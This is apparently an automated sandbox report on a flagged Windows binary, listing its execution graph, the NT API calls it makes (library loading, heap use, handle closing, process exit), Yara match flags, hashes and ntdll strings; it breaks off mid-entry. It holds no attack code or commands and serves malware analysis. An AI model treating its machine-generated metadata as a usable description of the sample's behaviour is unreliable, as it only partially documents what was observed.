                execution_graph 78191 42f7c3 78192 42f7d3 78191->78192 78193 42f7d9 78191->78193 78196 42e803 78193->78196 78195 42f7ff 78199 42c963 78196->78199 78198 42e81b 78198->78195 78200 42c980 78199->78200 78201 42c991 RtlAllocateHeap 78200->78201 78201->78198 78202 4249e3 78203 4249ff 78202->78203 78204 424a27 78203->78204 78205 424a3b 78203->78205 78207 42c653 NtClose 78204->78207 78212 42c653 78205->78212 78209 424a30 78207->78209 78208 424a44 78215 42e843 RtlAllocateHeap 78208->78215 78211 424a4f 78213 42c670 78212->78213 78214 42c681 NtClose 78213->78214 78214->78208 78215->78211 78216 42fba3 78218 42fbc9 78216->78218 78217 42fc1b 78218->78217 78221 429b43 78218->78221 78220 42fc70 78222 429ba1 78221->78222 78224 429bb5 78222->78224 78225 417923 78222->78225 78224->78220 78226 4178fe 78225->78226 78227 417903 LdrLoadDll 78226->78227 78228 41791a 78226->78228 78227->78228 78228->78224 78303 424d73 78304 424d8c 78303->78304 78305 424dd4 78304->78305 78308 424e14 78304->78308 78310 424e19 78304->78310 78306 42e723 RtlFreeHeap 78305->78306 78307 424de4 78306->78307 78309 42e723 RtlFreeHeap 78308->78309 78309->78310 78311 42bc33 78312 42bc50 78311->78312 78315 1412df0 LdrInitializeThunk 78312->78315 78313 42bc78 78315->78313 78316 413dd3 78320 413df3 78316->78320 78318 413e5c 78319 413e52 78320->78318 78321 41b493 RtlFreeHeap LdrInitializeThunk 78320->78321 78321->78319 78322 41e553 78323 41e579 78322->78323 78327 41e66d 78323->78327 78328 42f8f3 78323->78328 78325 41e60b 78326 42bc83 LdrInitializeThunk 78325->78326 78325->78327 78326->78327 78329 42f863 78328->78329 78330 42e803 RtlAllocateHeap 78329->78330 78333 42f8c0 78329->78333 78331 42f89d 78330->78331 78332 42e723 RtlFreeHeap 78331->78332 78332->78333 78333->78325 78229 401aaf 78230 401af0 78229->78230 78233 42fc93 78230->78233 78236 42e2d3 78233->78236 78237 42e2f9 78236->78237 78246 407363 78237->78246 78239 42e30f 78245 401b29 78239->78245 78249 41b183 78239->78249 78241 42e32e 78242 42ca03 ExitProcess 78241->78242 78243 42e343 78241->78243 78242->78243 78260 42ca03 78243->78260 78263 4165c3 78246->78263 78248 407370 78248->78239 78250 41b1af 78249->78250 78287 41b073 78250->78287 78253 41b1f4 78255 41b210 78253->78255 78258 42c653 NtClose 78253->78258 78254 41b1dc 78256 41b1e7 78254->78256 78257 42c653 NtClose 78254->78257 78255->78241 78256->78241 78257->78256 78259 41b206 78258->78259 78259->78241 78261 42ca20 78260->78261 78262 42ca31 ExitProcess 78261->78262 78262->78245 78264 4165e0 78263->78264 78266 4165f6 78264->78266 78267 42d0b3 78264->78267 78266->78248 78269 42d0cd 78267->78269 78268 42d0fc 78268->78266 78269->78268 78274 42bc83 78269->78274 78275 42bca0 78274->78275 78281 1412c0a 78275->78281 78276 42bccc 78278 42e723 78276->78278 78284 42c9b3 78278->78284 78280 42d175 78280->78266 78282 1412c11 78281->78282 78283 1412c1f LdrInitializeThunk 78281->78283 78282->78276 78283->78276 78285 42c9cd 78284->78285 78286 42c9de RtlFreeHeap 78285->78286 78286->78280 78288 41b08d 78287->78288 78292 41b169 78287->78292 78293 42bd23 78288->78293 78291 42c653 NtClose 78291->78292 78292->78253 78292->78254 78294 42bd3d 78293->78294 78297 14135c0 LdrInitializeThunk 78294->78297 78295 41b15d 78295->78291 78297->78295

                Executed Functions

                Function 004178A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 16 4178a3-4178bf 17 4178c7-4178cc 16->17 18 4178c2 call 42f303 16->18 19 4178d2-4178e0 call 42f903 17->19 20 4178ce-4178d1 17->20 18->17 23 4178f0-417901 call 42dda3 19->23 24 4178e2-4178ed call 42fba3 19->24 29 417903-417917 LdrLoadDll 23->29 30 41791a-41791d 23->30 24->23 29->30
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417915
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: cbab83aef83a10a84f5ef6732c373c3acc52a2678cba4dfdbf0d64c4860cd698
                • Instruction ID: 8209d0e57d3f9ee8776283508f5b43adc7fea2bb31117a6cf7831e28f1113799
                • Opcode Fuzzy Hash: cbab83aef83a10a84f5ef6732c373c3acc52a2678cba4dfdbf0d64c4860cd698
                • Instruction Fuzzy Hash: D10152B1E0420DBBDB10EAE1DC42FDEB3789B54308F4081AAED0897240F635EB588755
                Function 0042C653 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 36 42c653-42c68f call 4046d3 call 42d893 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C68A
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: e84ffca91ac5513f6fba90e19de2b90fb452bcefd3371e7e0b0c3703f1927d48
                • Instruction ID: 1de71df4542a3f95f9a59ff784aca2d683ff7f388b899a261398094b3d0adae2
                • Opcode Fuzzy Hash: e84ffca91ac5513f6fba90e19de2b90fb452bcefd3371e7e0b0c3703f1927d48
                • Instruction Fuzzy Hash: E7E086766002147BC120FA5ADC41FDBB79DDFC5714F40442AFA4867241DAB5BA1187F4
                Function 014135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 52 14135c0-14135cc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3d80df76651713fff50e41673eb8fae0d1efaa5f587d9f2455d8321bbf9fb302
                • Instruction ID: 33f60ad1dc0912bf0940c509c302786380f1e896608df5785ac9ff8924f7718c
                • Opcode Fuzzy Hash: 3d80df76651713fff50e41673eb8fae0d1efaa5f587d9f2455d8321bbf9fb302
                • Instruction Fuzzy Hash: 9A90023160551502D1007158451570A10459BE0201FA5C412E0424569DCBA58A9166A2
                Function 01412DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 51 1412df0-1412dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 17ac63bc0360fff4026dda7b9cee5d7590af51dd09b61e95a4486d56edfada29
                • Instruction ID: f1a4fd6390e33f0c2a86ceb64612873f5937781f025aaf7464e4a2bdf3428dda
                • Opcode Fuzzy Hash: 17ac63bc0360fff4026dda7b9cee5d7590af51dd09b61e95a4486d56edfada29
                • Instruction Fuzzy Hash: 5790023120141513D1117158450570B00499BE0241FD5C413E0424559DDB668A92A221
                Function 01412C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 50 1412c70-1412c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 240371e19ef3b01227155a9324b9da91f5729472224c9975292bd835d7d8ddbd
                • Instruction ID: e4d4aad97d54eb28dff7387d36208dabd920312f8867fd4be62cad44554950d2
                • Opcode Fuzzy Hash: 240371e19ef3b01227155a9324b9da91f5729472224c9975292bd835d7d8ddbd
                • Instruction Fuzzy Hash: 9E90023120149902D1107158840574E00459BE0301F99C412E4424659DCBA589D17221
                Function 00417923 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 417923-417951 1 417952-417957 0->1 1->1 2 417959 1->2 3 4179a1-4179a6 2->3 4 41795b-417963 2->4 5 417965-41798a 4->5 6 4178fe-417901 4->6 8 417903-417917 LdrLoadDll 6->8 9 41791a-41791d 6->9 8->9
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: QiMS
                • API String ID: 0-2722526834
                • Opcode ID: 114117af6bb83ce1e9657297158c1796903815e05adb4828947c5e112392eb63
                • Instruction ID: 6da8a37f0ccc112040d95729a47783922988f37fc004ad3508054dcea75b6210
                • Opcode Fuzzy Hash: 114117af6bb83ce1e9657297158c1796903815e05adb4828947c5e112392eb63
                • Instruction Fuzzy Hash: 47115B7296D10AEEDB10DA74C89ADEAFB7CDF05721F10018FE5444B142E674AA85CB98
                Function 0042C9B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 11 42c9b3-42c9f4 call 4046d3 call 42d893 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9EF
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: QfA
                • API String ID: 3298025750-2688753842
                • Opcode ID: dbbc1d9540ceb385b9491207ec0da6bc32bfd0ec31f51a615c30888ad098f935
                • Instruction ID: 27adb66dd514a632a787eb5d1545fea6ab9c47867af62de6f2d5d9bfd35157b1
                • Opcode Fuzzy Hash: dbbc1d9540ceb385b9491207ec0da6bc32bfd0ec31f51a615c30888ad098f935
                • Instruction Fuzzy Hash: A3E092B1604244BBCA10EE99EC41FDF37ADEFC5710F004419F908A7281D674B91087B8
                Function 0042C963 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 31 42c963-42c9a7 call 4046d3 call 42d893 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E60B,?,?,00000000,?,0041E60B,?,?,?), ref: 0042C9A2
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: ba27e71a0b50d88b35b5644137f451ab9c4229fed9e00da27dfea57a2d3d14e2
                • Instruction ID: 846a435d01e8fe3d4767557f6bcc630e013711a684105c3900cbf695702194df
                • Opcode Fuzzy Hash: ba27e71a0b50d88b35b5644137f451ab9c4229fed9e00da27dfea57a2d3d14e2
                • Instruction Fuzzy Hash: CEE092716002147BC610EF99DC41FDF33ADDFC5710F004419F918A7281D670B91187B8
                Function 0042CA03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 41 42ca03-42ca3f call 4046d3 call 42d893 ExitProcess
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_x.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: aa4483255ec4c68257efec815bcf2fa6b5ce5cc0a61e06dad325f748d2778cc1
                • Instruction ID: 07f363ee2cbae7c98999bc2a2956a8edd1d99da989b4d74ddfc2f01b73d53091
                • Opcode Fuzzy Hash: aa4483255ec4c68257efec815bcf2fa6b5ce5cc0a61e06dad325f748d2778cc1
                • Instruction Fuzzy Hash: ABE026326002043BD220FB5AEC41FCB775DCFC2314F004419FA4867242C670790083F5
                Function 01412C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 46 1412c0a-1412c0f 47 1412c11-1412c18 46->47 48 1412c1f-1412c26 LdrInitializeThunk 46->48
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 922021b49d4cb36dfe2b4c7bef472d1bf340ca4569a50c07c5320b1431c55581
                • Instruction ID: b13324d9eebbab6f888d39b816fc6d4b3ed3a7edbd475c1cf64b819b1cad7d0a
                • Opcode Fuzzy Hash: 922021b49d4cb36dfe2b4c7bef472d1bf340ca4569a50c07c5320b1431c55581
                • Instruction Fuzzy Hash: 25B09B719015D6C6DA11E7644609B1B79407BE0701F65C063D3034653F4778C1D1E275

                Non-executed Functions

                Function 01452349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: 3fbba933b92ea922fa0927f7588075348a37b1f02617d127acd46386e64deb71
                • Instruction ID: a26dacfa5f3d326fc82abeb4ce37fb71181544758408d30dc0c5614299720216
                • Opcode Fuzzy Hash: 3fbba933b92ea922fa0927f7588075348a37b1f02617d127acd46386e64deb71
                • Instruction Fuzzy Hash: 00926C71604342EBE761CE29C880F6BB7E8BB84754F04491FFA9597362D7B0E845CB92
                Function 014812ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                • API String ID: 0-3591852110
                • Opcode ID: 6a1e54f5adae5aa09d65f5e3118d4716c16bbb0c120262a6829c5cabdfd34478
                • Instruction ID: 2b5e244eaea7b575234c62e4e9b863f3fa9432ecfd5b3ce2b14d0ac9b61acabb
                • Opcode Fuzzy Hash: 6a1e54f5adae5aa09d65f5e3118d4716c16bbb0c120262a6829c5cabdfd34478
                • Instruction Fuzzy Hash: E3128D306006429FD725AF29C441BBABBE5FF19A18F18845FE4869B762D734E882CB50
                Function 013CD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                • API String ID: 0-3532704233
                • Opcode ID: 2029eb342b5391cc57a7b24b402311a7c98ad51532c1da1f3b8e358383b5c005
                • Instruction ID: 57b6d458d2b16f1fd6afb7c2945766c64cc25414b4cf46511990747d67c33912
                • Opcode Fuzzy Hash: 2029eb342b5391cc57a7b24b402311a7c98ad51532c1da1f3b8e358383b5c005
                • Instruction Fuzzy Hash: D4B1AC725083169FC711DF68C880A6BBBE8BB98B58F41092EF989D7210D770DD48CBD2
                Function 01469179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                • API String ID: 0-3063724069
                • Opcode ID: 08a95ed93b5e6aeb20a9f53b3f4cf5b6cc53bfddb32030b7b4bba94f9df66815
                • Instruction ID: 79028e93ea2a260cb7df7de45736346b5ecc7be7a0500fef90e93d3a855f2b38
                • Opcode Fuzzy Hash: 08a95ed93b5e6aeb20a9f53b3f4cf5b6cc53bfddb32030b7b4bba94f9df66815
                • Instruction Fuzzy Hash: 85D1A572804316AFD721DA58C840B6BBBECAF94B5CF04492EFA4897260E7B0DD44C793
                Function 01480274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: 2e77036aba87f8be474ddb6654da575d1c8b7f47ab54d0dac109c8d7d8d4fb41
                • Instruction ID: add9e77f2061baaef9865cfc49c1c10f8a3106eb6fd8064b85430805a75fc4f5
                • Opcode Fuzzy Hash: 2e77036aba87f8be474ddb6654da575d1c8b7f47ab54d0dac109c8d7d8d4fb41
                • Instruction Fuzzy Hash: C7D1CE31520685DFDB22EF6CC451AAEBBF1FF59B18F08805EE445AB362C7349949CB20
                Function 013CD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                Download Yara Rule
                Strings
                • @, xrefs: 013CD0FD
                • Control Panel\Desktop\LanguageConfiguration, xrefs: 013CD196
                • @, xrefs: 013CD313
                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 013CD0CF
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 013CD2C3
                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 013CD262
                • @, xrefs: 013CD2AF
                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 013CD146
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                • API String ID: 0-1356375266
                • Opcode ID: 6b2497a77e0e031959acec68155835c1c88899318ee67af71ab411b96bd07d61
                • Instruction ID: 510a4874c152b40c2c2645a408bfc7c54644e5debda946dea7e7f4e8436e1e24
                • Opcode Fuzzy Hash: 6b2497a77e0e031959acec68155835c1c88899318ee67af71ab411b96bd07d61
                • Instruction Fuzzy Hash: DAA1AD719083069FE721CF65C840B5BBBE8BB94B28F50492EFA8897251D774D948CF93
                Function 013CF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-523794902
                • Opcode ID: 1a82051e5d8c9acc6dba2e47ce69e809c410ebd369f3ec38a72476150e9247e2
                • Instruction ID: aa9370433db2ac2dc2269a8b0cb07c5c5889e0e8dcb01b6283a3adddfa61bd3b
                • Opcode Fuzzy Hash: 1a82051e5d8c9acc6dba2e47ce69e809c410ebd369f3ec38a72476150e9247e2
                • Instruction Fuzzy Hash: 3A42F0712083829FD715DF28C484B6BBBEAFF94A08F14496EE4869B362D730DC85CB51
                Function 013EB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                • API String ID: 0-122214566
                • Opcode ID: 73c3aab19f82c945c010fe3193b0533ce322ad15dfa80365981af014767807ad
                • Instruction ID: 586652c6b8bb9bae77c964f10b5926f144c99b7a6031fd37108a8bdbc4857ce0
                • Opcode Fuzzy Hash: 73c3aab19f82c945c010fe3193b0533ce322ad15dfa80365981af014767807ad
                • Instruction Fuzzy Hash: CAC15B31A003269BDB268F68C889BBEFBE5AF55318F04416AED01AB7D5E770CC44C391
                Function 014063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 93742a5fe735053eefbae4e7f7665770c4b5a9a2589d6e0eda87051939c19713
                • Instruction ID: 768c0d012a7ee43dc191bb3608d79ff910e4c51655e27a75533b60aa27d71ff2
                • Opcode Fuzzy Hash: 93742a5fe735053eefbae4e7f7665770c4b5a9a2589d6e0eda87051939c19713
                • Instruction Fuzzy Hash: 06913670B013119BEB26DF1AE849BAA7BA1BF10B58F1A413FE5016B7F1D7705802C794
                Function 0147F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                • API String ID: 0-1745908468
                • Opcode ID: 2f93ca12ae18751f3b58b2844f327262f07ec8eac55062af0542646315a4d5fe
                • Instruction ID: da1e9df7d0e8dc4df25a312b05a54d3b4a4fbf3d7e12fa23cff43e8b2539922d
                • Opcode Fuzzy Hash: 2f93ca12ae18751f3b58b2844f327262f07ec8eac55062af0542646315a4d5fe
                • Instruction Fuzzy Hash: AC91CD31900641DFDB22DF69C441AEABBF1FF69B18F18805EE465AB372CB359949CB10
                Function 013C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                Download Yara Rule
                Strings
                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01429A01
                • apphelp.dll, xrefs: 013C6496
                • minkernel\ntdll\ldrinit.c, xrefs: 01429A11, 01429A3A
                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014299ED
                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01429A2A
                • LdrpInitShimEngine, xrefs: 014299F4, 01429A07, 01429A30
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-204845295
                • Opcode ID: e3fb68e9c814371cb4dcf3082878b3bc9d18c0419846c42d6e88303d795a3e2e
                • Instruction ID: e74629c8b0b93ab408306dd6d2dbc7e5687c94f8996e71c41b5f75c1aabef317
                • Opcode Fuzzy Hash: e3fb68e9c814371cb4dcf3082878b3bc9d18c0419846c42d6e88303d795a3e2e
                • Instruction Fuzzy Hash: 1451D1712083559FE720DF28D886BAB77E8FB94B48F40491EF58597260EA30ED44CB92
                Function 013FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014402E7
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014402BD
                • RTL: Re-Waiting, xrefs: 0144031E
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 50a7ba8d392e8b9df5f24d91e13d172b94ff09ada8a5aa3d28ea10ddb810ba7e
                • Instruction ID: 64a167707d2b1f2ef8c2b64449834b3e1f95807ba963c1085d4f85dce6a75e34
                • Opcode Fuzzy Hash: 50a7ba8d392e8b9df5f24d91e13d172b94ff09ada8a5aa3d28ea10ddb810ba7e
                • Instruction Fuzzy Hash: A2E1CF316047419FE725CF28C884B6ABBE8BB84728F140A1EFA95CB3E1D775D855CB42
                Function 013F51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                Download Yara Rule
                Strings
                • Kernel-MUI-Language-SKU, xrefs: 013F542B
                • Kernel-MUI-Language-Disallowed, xrefs: 013F5352
                • Kernel-MUI-Number-Allowed, xrefs: 013F5247
                • Kernel-MUI-Language-Allowed, xrefs: 013F527B
                • WindowsExcludedProcs, xrefs: 013F522A
                Memory Dump Source
